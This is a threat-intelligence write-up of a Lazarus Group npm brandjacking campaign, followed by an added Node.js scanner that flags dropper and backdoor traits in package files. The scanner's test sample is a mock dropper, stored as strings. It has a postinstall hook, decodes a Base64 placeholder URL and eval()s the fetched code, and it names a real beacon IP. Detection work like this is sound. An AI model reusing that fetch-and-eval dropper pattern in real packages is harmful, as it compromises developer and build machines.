Lazarus Group's Latest: Brandjacking Campaign on npm

2026-06-03 Sonatype

https://www.sonatype.com/blog/lazarus-groups-latest-brandjacking-campaign-on-npm


Sonatype attributes a malicious npm brandjacking campaign to Lazarus Group, involving dozens of packages that imitate or appear adjacent to trusted JavaScript ecosystems such as Buffer, Chai, and React. Analysis of `buffer-utilities` shows a dropper that embeds legitimate Buffer code while fetching Base64-encoded payload URLs from `www.jsonkeeper.com` and executing the retrieved code with `eval()`. The second-stage Node.js backdoor collects host telemetry, beacons to `45.59.163.198:1244`, creates a hidden `.vscode` directory, installs dependencies, and launches a third-stage JavaScript payload as a detached background process. The campaign matters because it moves beyond simple typosquatting, using plausible ecosystem-adjacent package names and copied legitimate code to compromise developer and build environments through routine dependency installation.
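The traits in that description (a dropper that decodes Base64 payload URLs and `eval()`s fetched code, a beacon to a hardcoded IP:port, a hidden `.vscode` directory, a runtime `npm install`, and a detached third-stage process) are all things a pre-install scanner can look for statically. The Node.js script below is an added example, not Sonatype's code and not from any of the campaign's packages: it scans a package's files for those traits, decodes long Base64 literals to surface hidden URLs, and returns a weighted verdict. Both sample packages are constructed stand-ins for the real `buffer-utilities` contents; the `jsonkeeper.com` path, placing the encoded staging URL in the source itself, the indicator weights and the flag threshold are assumptions made for illustration.

```javascript
'use strict';
// Added example, not Sonatype's code: a heuristic static scan of an npm
// package's files for the dropper and backdoor traits described above.
// The two sample packages at the bottom are constructed stand-ins, not the
// real buffer-utilities contents; the jsonkeeper.com path is a placeholder.

// Source-level indicators: regex over the file text, a weight (assumed), and a note.
const INDICATORS = [
  { id: 'eval-call',        weight: 3, note: 'eval() of runtime-assembled code',
    re: /\beval\s*\(/g },
  { id: 'base64-decode',    weight: 1, note: 'Base64 decoding of an embedded string',
    re: /Buffer\.from\s*\([^;]*?['"]base64['"]\s*\)|\batob\s*\(/g },
  { id: 'staging-host',     weight: 3, note: 'jsonkeeper.com used to stage payload URLs',
    re: /jsonkeeper\.com/gi },
  { id: 'hidden-vscode',    weight: 2, note: 'creates a hidden .vscode directory',
    re: /mkdir\w*\s*\([\s\S]{0,80}?\.vscode/g },
  { id: 'runtime-install',  weight: 2, note: 'runs npm install from code at runtime',
    re: /exec\w*\s*\(\s*['"`]npm\s+(?:i|install)\b/g },
  { id: 'detached-process', weight: 2, note: 'launches a detached background child process',
    re: /detached\s*:\s*true|\.unref\s*\(\s*\)/g },
  { id: 'install-hook',     weight: 2, note: 'lifecycle script runs during npm install',
    re: /"(?:pre|post)install"\s*:/g },
];

// Base64 literals long enough to hide a URL; each is decoded and re-encoded to
// confirm it is canonical Base64 before the decoded text is treated as evidence.
const B64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
function stagedUrls(text) {
  const urls = [];
  for (const m of text.matchAll(B64_LITERAL)) {
    const buf = Buffer.from(m[1], 'base64');
    if (buf.toString('base64') !== m[1]) continue;
    const decoded = buf.toString('utf8');
    if (/^https?:\/\/\S+$/.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// A hardcoded public IPv4 (optionally with a port) is a beacon-target signal;
// loopback, link-local and RFC 1918 ranges are ignored to limit noise.
const IPV4 = /\b(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})(?::\d{2,5})?\b/g;
function isPublicIPv4(octets) {
  if (octets.some(n => n > 255)) return false;
  const [a, b] = octets;
  if (a === 0 || a === 10 || a === 127 || a >= 224) return false;
  if (a === 169 && b === 254) return false;
  if (a === 172 && b >= 16 && b <= 31) return false;
  if (a === 192 && b === 168) return false;
  return true;
}

// files: { relativePath: fileText }. Returns findings and a weighted score.
function scanPackage(files) {
  const findings = [];
  const add = (file, id, weight, note, evidence) =>
    findings.push({ file, id, weight, note, evidence: evidence.slice(0, 80) });
  for (const [file, text] of Object.entries(files)) {
    const decoded = stagedUrls(text);
    for (const url of decoded) add(file, 'staged-url', 3, 'Base64 literal decodes to a URL', url);
    // Run the indicators over the raw text and over every decoded URL, so a
    // staging host hidden behind Base64 is still attributed to the file.
    for (const ind of INDICATORS) {
      for (const src of [text, ...decoded]) {
        for (const m of src.matchAll(ind.re)) add(file, ind.id, ind.weight, ind.note, m[0]);
      }
    }
    for (const m of text.matchAll(IPV4)) {
      if (isPublicIPv4(m.slice(1, 5).map(Number))) {
        add(file, 'public-ip', 2, 'hardcoded public IP, possible beacon target', m[0]);
      }
    }
  }
  const score = findings.reduce((s, f) => s + f.weight, 0);
  return { score, flagged: score >= 6, findings }; // threshold is an assumption
}

// Constructed sample mimicking the described dropper (strings only, never executed).
const ENCODED_URL = Buffer.from('https://www.jsonkeeper.com/b/PLACEHOLDER').toString('base64');
const SAMPLE_MALICIOUS = {
  'package.json': JSON.stringify({ name: 'buffer-utilities', version: '0.0.1', main: 'index.js',
    scripts: { postinstall: 'node lib/setup.js' } }),
  'index.js': 'module.exports = require("buffer"); // legitimate-looking cover code\n',
  'lib/setup.js': [
    "const https = require('https');",
    "const { execSync, spawn } = require('child_process');",
    `const url = Buffer.from('${ENCODED_URL}', 'base64').toString();`,
    "https.get(url, r => { let body = ''; r.on('data', c => body += c); r.on('end', () => eval(body)); });",
    "const [host, port] = '45.59.163.198:1244'.split(':'); // beacon target from the report's IOC",
    "require('fs').mkdirSync(require('path').join(require('os').homedir(), '.vscode'), { recursive: true });",
    "execSync('npm install', { cwd: require('os').homedir() + '/.vscode' });",
    "spawn(process.execPath, ['stage3.js'], { detached: true, stdio: 'ignore' }).unref();",
  ].join('\n'),
};
// Constructed benign sample: a tiny hex helper with no suspicious traits.
const SAMPLE_BENIGN = {
  'package.json': JSON.stringify({ name: 'tiny-hex', version: '1.2.0', main: 'index.js' }),
  'index.js': "exports.toHex = s => Buffer.from(s, 'utf8').toString('hex');\n",
};

// Stand-alone run: print both sample verdicts.
for (const [name, pkg] of [['malicious', SAMPLE_MALICIOUS], ['benign', SAMPLE_BENIGN]]) {
  const result = scanPackage(pkg);
  console.log(`${name}: score=${result.score} flagged=${result.flagged}`);
  for (const f of result.findings) console.log(`  ${f.file}: ${f.id} -> ${f.evidence}`);
}
```

Run it against an unpacked tarball (`npm pack <name>` then read the extracted files into the `files` map) before the package ever reaches `npm install`, since the `postinstall` hook is exactly the point at which the dropper executes. The regexes are deliberately loose and will fire on legitimate tooling that spawns detached processes or embeds Base64 data, so the score is a triage signal for manual review, not a verdict on its own.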

Indicators of Compromise

Type   Value           First Seen   Last Seen
IPv4   45.59.163.198   2026-06-03   2026-06-03
